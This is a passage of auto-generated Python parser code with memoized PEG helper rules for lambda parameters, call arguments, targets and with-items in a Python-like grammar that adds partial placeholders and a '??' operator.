# _loop1_103: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_104(self) -> Optional[Any]:
# _loop0_104: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_105(self) -> Optional[Any]:
# _loop1_105: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_106(self) -> Optional[Any]:
# _loop0_106: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_107(self) -> Optional[Any]:
# _loop1_107: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_108(self) -> Optional[Any]:
# _loop0_108: lambda_param_maybe_default
mark = self._mark()
children = []
while (
(lambda_param_maybe_default := self.lambda_param_maybe_default())
):
children.append(lambda_param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_109(self) -> Optional[Any]:
# _loop1_109: lambda_param_maybe_default
mark = self._mark()
children = []
while (
(lambda_param_maybe_default := self.lambda_param_maybe_default())
):
children.append(lambda_param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_110(self) -> Optional[Any]:
# _loop1_110: STRING
mark = self._mark()
children = []
while (
(string := self.string())
):
children.append(string)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_111(self) -> Optional[Any]:
# _tmp_111: star_named_expression ',' star_named_expressions?
mark = self._mark()
if (
(y := self.star_named_expression())
and
(literal := self.expect(','))
and
(z := self.star_named_expressions(),)
):
return [y] + ( z or [] )
self._reset(mark)
return None
@memoize
def _loop0_113(self) -> Optional[Any]:
# _loop0_113: ',' double_starred_kvpair
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.double_starred_kvpair())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_112(self) -> Optional[Any]:
# _gather_112: double_starred_kvpair _loop0_113
mark = self._mark()
if (
(elem := self.double_starred_kvpair())
is not None
and
(seq := self._loop0_113())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_114(self) -> Optional[Any]:
# _loop1_114: for_if_clause
mark = self._mark()
children = []
while (
(for_if_clause := self.for_if_clause())
):
children.append(for_if_clause)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_115(self) -> Optional[Any]:
# _loop0_115: ('if' disjunction)
mark = self._mark()
children = []
while (
(_tmp_207 := self._tmp_207())
):
children.append(_tmp_207)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_116(self) -> Optional[Any]:
# _loop0_116: ('if' disjunction)
mark = self._mark()
children = []
while (
(_tmp_208 := self._tmp_208())
):
children.append(_tmp_208)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_117(self) -> Optional[Any]:
# _tmp_117: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _loop0_119(self) -> Optional[Any]:
# _loop0_119: ',' (starred_expression | (assignment_expression | expression !':=') !'=')
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_209())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_118(self) -> Optional[Any]:
# _gather_118: (starred_expression | (assignment_expression | expression !':=') !'=') _loop0_119
mark = self._mark()
if (
(elem := self._tmp_209())
is not None
and
(seq := self._loop0_119())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_120(self) -> Optional[Any]:
# _tmp_120: ',' kwargs
mark = self._mark()
if (
(literal := self.expect(','))
and
(k := self.kwargs())
):
return k
self._reset(mark)
return None
@memoize
def _loop0_122(self) -> Optional[Any]:
# _loop0_122: ',' kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_121(self) -> Optional[Any]:
# _gather_121: kwarg_or_starred _loop0_122
mark = self._mark()
if (
(elem := self.kwarg_or_starred())
is not None
and
(seq := self._loop0_122())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_124(self) -> Optional[Any]:
# _loop0_124: ',' kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_123(self) -> Optional[Any]:
# _gather_123: kwarg_or_double_starred _loop0_124
mark = self._mark()
if (
(elem := self.kwarg_or_double_starred())
is not None
and
(seq := self._loop0_124())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_126(self) -> Optional[Any]:
# _loop0_126: ',' kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_125(self) -> Optional[Any]:
# _gather_125: kwarg_or_starred _loop0_126
mark = self._mark()
if (
(elem := self.kwarg_or_starred())
is not None
and
(seq := self._loop0_126())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_128(self) -> Optional[Any]:
# _loop0_128: ',' kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_127(self) -> Optional[Any]:
# _gather_127: kwarg_or_double_starred _loop0_128
mark = self._mark()
if (
(elem := self.kwarg_or_double_starred())
is not None
and
(seq := self._loop0_128())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_130(self) -> Optional[Any]:
# _loop0_130: "," (partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=')
mark = self._mark()
children = []
while (
(literal := self.expect(","))
and
(elem := self._tmp_210())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_129(self) -> Optional[Any]:
# _gather_129: (partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=') _loop0_130
mark = self._mark()
if (
(elem := self._tmp_210())
is not None
and
(seq := self._loop0_130())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_131(self) -> Optional[Any]:
# _tmp_131: ',' partial_kwargs
mark = self._mark()
if (
(literal := self.expect(','))
and
(k := self.partial_kwargs())
):
return k
self._reset(mark)
return None
@memoize
def _loop0_133(self) -> Optional[Any]:
# _loop0_133: ',' partial_kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_132(self) -> Optional[Any]:
# _gather_132: partial_kwarg_or_starred _loop0_133
mark = self._mark()
if (
(elem := self.partial_kwarg_or_starred())
is not None
and
(seq := self._loop0_133())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_135(self) -> Optional[Any]:
# _loop0_135: ',' partial_kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_134(self) -> Optional[Any]:
# _gather_134: partial_kwarg_or_double_starred _loop0_135
mark = self._mark()
if (
(elem := self.partial_kwarg_or_double_starred())
is not None
and
(seq := self._loop0_135())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_137(self) -> Optional[Any]:
# _loop0_137: ',' partial_kwarg_or_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_136(self) -> Optional[Any]:
# _gather_136: partial_kwarg_or_starred _loop0_137
mark = self._mark()
if (
(elem := self.partial_kwarg_or_starred())
is not None
and
(seq := self._loop0_137())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_139(self) -> Optional[Any]:
# _loop0_139: ',' partial_kwarg_or_double_starred
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.partial_kwarg_or_double_starred())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_138(self) -> Optional[Any]:
# _gather_138: partial_kwarg_or_double_starred _loop0_139
mark = self._mark()
if (
(elem := self.partial_kwarg_or_double_starred())
is not None
and
(seq := self._loop0_139())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_140(self) -> Optional[Any]:
# _tmp_140: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_141(self) -> Optional[Any]:
# _tmp_141: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_142(self) -> Optional[Any]:
# _tmp_142: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_143(self) -> Optional[Any]:
# _tmp_143: partial_placeholder | expression
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def _loop0_144(self) -> Optional[Any]:
# _loop0_144: (',' star_target)
mark = self._mark()
children = []
while (
(_tmp_211 := self._tmp_211())
):
children.append(_tmp_211)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_146(self) -> Optional[Any]:
# _loop0_146: ',' star_target
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.star_target())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_145(self) -> Optional[Any]:
# _gather_145: star_target _loop0_146
mark = self._mark()
if (
(elem := self.star_target())
is not None
and
(seq := self._loop0_146())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_147(self) -> Optional[Any]:
# _loop1_147: (',' star_target)
mark = self._mark()
children = []
while (
(_tmp_212 := self._tmp_212())
):
children.append(_tmp_212)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_148(self) -> Optional[Any]:
# _tmp_148: !'*' star_target
mark = self._mark()
if (
self.negative_lookahead(self.expect, '*')
and
(star_target := self.star_target())
):
return star_target
self._reset(mark)
return None
@memoize
def _loop0_150(self) -> Optional[Any]:
# _loop0_150: ',' del_target
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.del_target())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_149(self) -> Optional[Any]:
# _gather_149: del_target _loop0_150
mark = self._mark()
if (
(elem := self.del_target())
is not None
and
(seq := self._loop0_150())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_152(self) -> Optional[Any]:
# _loop0_152: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_151(self) -> Optional[Any]:
# _gather_151: expression _loop0_152
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_152())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_154(self) -> Optional[Any]:
# _loop0_154: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_153(self) -> Optional[Any]:
# _gather_153: expression _loop0_154
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_154())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_156(self) -> Optional[Any]:
# _loop0_156: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_155(self) -> Optional[Any]:
# _gather_155: expression _loop0_156
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_156())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_158(self) -> Optional[Any]:
# _loop0_158: ',' expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_157(self) -> Optional[Any]:
# _gather_157: expression _loop0_158
mark = self._mark()
if (
(elem := self.expression())
is not None
and
(seq := self._loop0_158())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_159(self) -> Optional[Any]:
# _tmp_159: NEWLINE INDENT
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
):
return [_newline, _indent]
self._reset(mark)
return None
@memoize
def _tmp_160(self) -> Optional[Any]:
# _tmp_160: args | expression for_if_clauses
mark = self._mark()
if (
(args := self.args())
):
return args
self._reset(mark)
if (
(expression := self.expression())
and
(for_if_clauses := self.for_if_clauses())
):
return [expression, for_if_clauses]
self._reset(mark)
return None
@memoize
def _tmp_161(self) -> Optional[Any]:
# _tmp_161: NAME '='
mark = self._mark()
if (
(name := self.name())
and
(literal := self.expect('='))
):
return [name, literal]
self._reset(mark)
return None
@memoize
def _tmp_162(self) -> Optional[Any]:
# _tmp_162: NAME STRING | SOFT_KEYWORD
mark = self._mark()
if (
(name := self.name())
and
(string := self.string())
):
return [name, string]
self._reset(mark)
if (
(soft_keyword := self.soft_keyword())
):
return soft_keyword
self._reset(mark)
return None
@memoize
def _tmp_163(self) -> Optional[Any]:
# _tmp_163: 'else' | ':'
mark = self._mark()
if (
(literal := self.expect('else'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_164(self) -> Optional[Any]:
# _tmp_164: '=' | ':='
mark = self._mark()
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':='))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_165(self) -> Optional[Any]:
# _tmp_165: list | tuple | genexp | 'True' | 'None' | 'False'
mark = self._mark()
if (
(list := self.list())
):
return list
self._reset(mark)
if (
(tuple := self.tuple())
):
return tuple
self._reset(mark)
if (
(genexp := self.genexp())
):
return genexp
self._reset(mark)
if (
(literal := self.expect('True'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('None'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('False'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_166(self) -> Optional[Any]:
# _tmp_166: '=' | ':='
mark = self._mark()
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':='))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_167(self) -> Optional[Any]:
# _loop0_167: star_named_expressions
mark = self._mark()
children = []
while (
(star_named_expressions := self.star_named_expressions())
):
children.append(star_named_expressions)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_168(self) -> Optional[Any]:
# _loop0_168: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_213 := self._tmp_213())
):
children.append(_tmp_213)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_169(self) -> Optional[Any]:
# _loop0_169: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_214 := self._tmp_214())
):
children.append(_tmp_214)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_170(self) -> Optional[Any]:
# _tmp_170: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_171(self) -> Optional[Any]:
# _tmp_171: '[' | '(' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_172(self) -> Optional[Any]:
# _tmp_172: '[' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_173(self) -> Optional[Any]:
# _tmp_173: '[' | '{'
mark = self._mark()
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('{'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_174(self) -> Optional[Any]:
# _loop0_174: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_175(self) -> Optional[Any]:
# _loop1_175: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_176(self) -> Optional[Any]:
# _loop0_176: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_177(self) -> Optional[Any]:
# _loop1_177: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_178(self) -> Optional[Any]:
# _tmp_178: ')' | ',' (')' | '**')
mark = self._mark()
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
and
(_tmp_215 := self._tmp_215())
):
return [literal, _tmp_215]
self._reset(mark)
return None
@memoize
def _tmp_179(self) -> Optional[Any]:
# _tmp_179: ':' | ',' (':' | '**')
mark = self._mark()
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
and
(_tmp_216 := self._tmp_216())
):
return [literal, _tmp_216]
self._reset(mark)
return None
@memoize
def _tmp_180(self) -> Optional[Any]:
# _tmp_180: ',' | ')' | ':'
mark = self._mark()
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_182(self) -> Optional[Any]:
# _loop0_182: ',' (expression ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_217())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_181(self) -> Optional[Any]:
# _gather_181: (expression ['as' star_target]) _loop0_182
mark = self._mark()
if (
(elem := self._tmp_217())
is not None
and
(seq := self._loop0_182())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_184(self) -> Optional[Any]:
# _loop0_184: ',' (expressions ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_218())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_183(self) -> Optional[Any]:
# _gather_183: (expressions ['as' star_target]) _loop0_184
mark = self._mark()
if (
(elem := self._tmp_218())
is not None
and
(seq := self._loop0_184())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_186(self) -> Optional[Any]:
# _loop0_186: ',' (expression ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_219())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_185(self) -> Optional[Any]:
# _gather_185: (expression ['as' star_target]) _loop0_186
mark = self._mark()
if (
(elem := self._tmp_219())
is not None
and
(seq := self._loop0_186())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_188(self) -> Optional[Any]:
# _loop0_188: ',' (expressions ['as' star_target])
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self._tmp_220())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_187(self) -> Optional[Any]:
# _gather_187: (expressions ['as' star_target]) _loop0_188
mark = self._mark()
if (
(elem := self._tmp_220())
is not None
and
(seq := self._loop0_188())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_189(self) -> Optional[Any]:
# _tmp_189: 'except' | 'finally'
mark = self._mark()
if (
(literal := self.expect('except'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('finally'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_190(self) -> Optional[Any]:
# _tmp_190: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_191(self) -> Optional[Any]:
# _tmp_191: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_192(self) -> Optional[Any]:
# _tmp_192: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(name := self.name())
):
return [literal, name]
self._reset(mark)
return None
@memoize
def _tmp_193(self) -> Optional[Any]:
# _tmp_193: positional_patterns ','
mark = self._mark()
if (
(positional_patterns := self.positional_patterns())
and
(literal := self.expect(','))
):
return [positional_patterns, literal]
self._reset(mark)
return None
@memoize
def _tmp_194(self) -> Optional[Any]:
# _tmp_194: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(expression := self.expression())
):
return [literal, expression]
self._reset(mark)
return None
@memoize
def _tmp_195(self) -> Optional[Any]:
# _tmp_195: '(' arguments? ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(opt := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
return [literal, opt, literal_1]
self._reset(mark)
return None
@memoize
def _loop0_197(self) -> Optional[Any]:
# _loop0_197: ',' double_starred_kvpair
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.double_starred_kvpair())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_196(self) -> Optional[Any]:
# _gather_196: double_starred_kvpair _loop0_197
mark = self._mark()
if (
(elem := self.double_starred_kvpair())
is not None
and
(seq := self._loop0_197())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_198(self) -> Optional[Any]:
# _tmp_198: '}' | ','
mark = self._mark()
if (
(literal := self.expect('}'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_199(self) -> Optional[Any]:
# _tmp_199: star_targets '='
mark = self._mark()
if (
(z := self.star_targets())
and
(literal := self.expect('='))
):
return z
self._reset(mark)
return None
@memoize
def _tmp_200(self) -> Optional[Any]:
# _tmp_200: '.' | '...'
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('...'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_201(self) -> Optional[Any]:
# _tmp_201: '.' | '...'
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('...'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_202(self) -> Optional[Any]:
# _tmp_202: ',' expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.expression())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_203(self) -> Optional[Any]:
# _tmp_203: ',' star_expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_expression())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_204(self) -> Optional[Any]:
# _tmp_204: 'or' conjunction
mark = self._mark()
if (
(literal := self.expect('or'))
and
(c := self.conjunction())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_205(self) -> Optional[Any]:
# _tmp_205: '??' conjunction
mark = self._mark()
if (
(literal := self.expect('??'))
and
(c := self.conjunction())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_206(self) -> Optional[Any]:
# _tmp_206: 'and' inversion
mark = self._mark()
if (
(literal := self.expect('and'))
and
(c := self.inversion())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_207(self) -> Optional[Any]:
# _tmp_207: 'if' disjunction
mark = self._mark()
if (
(literal := self.expect('if'))
and
(z := self.disjunction())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_208(self) -> Optional[Any]:
# _tmp_208: 'if' disjunction
mark = self._mark()
if (
(literal := self.expect('if'))
and
(z := self.disjunction())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_209(self) -> Optional[Any]:
# _tmp_209: starred_expression | (assignment_expression | expression !':=') !'='
mark = self._mark()
if (
(starred_expression := self.starred_expression())
):
return starred_expression
self._reset(mark)
if (
(_tmp_221 := self._tmp_221())
and
self.negative_lookahead(self.expect, '=')
):
return _tmp_221
self._reset(mark)
return None
@memoize
def _tmp_210(self) -> Optional[Any]:
# _tmp_210: partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'='
mark = self._mark()
if (
(partial_placeholder := self.partial_placeholder())
):
return partial_placeholder
self._reset(mark)
if (
(partial_starred_expression := self.partial_starred_expression())
):
return partial_starred_expression
self._reset(mark)
if (
(_tmp_222 := self._tmp_222())
and
self.negative_lookahead(self.expect, '=')
):
return _tmp_222
self._reset(mark)
return None
@memoize
def _tmp_211(self) -> Optional[Any]:
# _tmp_211: ',' star_target
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_target())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_212(self) -> Optional[Any]:
# _tmp_212: ',' star_target
mark = self._mark()
if (
(literal := self.expect(','))
and
(c := self.star_target())
):
return c
self._reset(mark)
return None
@memoize
def _tmp_213(self) -> Optional[Any]:
# _tmp_213: star_targets '='
mark = self._mark()
if (
(star_targets := self.star_targets())
and
(literal := self.expect('='))
):
return [star_targets, literal]
self._reset(mark)
return None
@memoize
def _tmp_214(self) -> Optional[Any]:
# _tmp_214: star_targets '='
mark = self._mark()
if (
(star_targets := self.star_targets())
and
(literal := self.expect('='))
):
return [star_targets, literal]
self._reset(mark)
return None
@memoize
def _tmp_215(self) -> Optional[Any]:
# _tmp_215: ')' | '**'
mark = self._mark()
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('**'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_216(self) -> Optional[Any]:
# _tmp_216: ':' | '**'
mark = self._mark()
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('**'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_217(self) -> Optional[Any]:
# _tmp_217: expression ['as' star_target]
mark = self._mark()
if (
(expression := self.expression())
and
(opt := self._tmp_223(),)
):
return [expression, opt]
self._reset(mark)
return None
@memoize
def _tmp_218(self) -> Optional[Any]:
# _tmp_218: expressions ['as' star_target]
mark = self._mark()
if (
(expressions := self.expressions())
and
(opt := self._tmp_224(),)
):
return [expressions, opt]
self._reset(mark)
return None
@memoize
def _tmp_219(self) -> Optional[Any]:
# _tmp_219: expression ['as' star_target]
mark = self._mark()
if (
(expression := self.expression())
and
(opt := self._tmp_225(),)
):
return [expression, opt]
self._reset(mark)
return None
@memoize
def _tmp_220(self) -> Optional[Any]:
# _tmp_220: expressions ['as' star_target]
mark = self._mark()
if (
(expressions := self.expressions())
and
(opt := self._tmp_226(),)
):
return [expressions, opt]
self._reset(mark)
return None
@memoize
def _tmp_221(self) -> Optional[Any]:
# _tmp_221: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_222(self) -> Optional[Any]:
# _tmp_222: assignment_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(expression := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return expression
self._reset(mark)
return None
@memoize
def _tmp_223(self) -> Optional[Any]:
# _tmp_223: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_224(self) -> Optional[Any]:
# _tmp_224: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_225(self) -> Optional[Any]:
# _tmp_225: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
@memoize
def _tmp_226(self) -> Optional[Any]:
# _tmp_226: 'as' star_target
mark = self._mark()
if (
(literal := self.expect('as'))
and
(star_target := self.star_target())
):
return [literal, star_target]
self._reset(mark)
return None
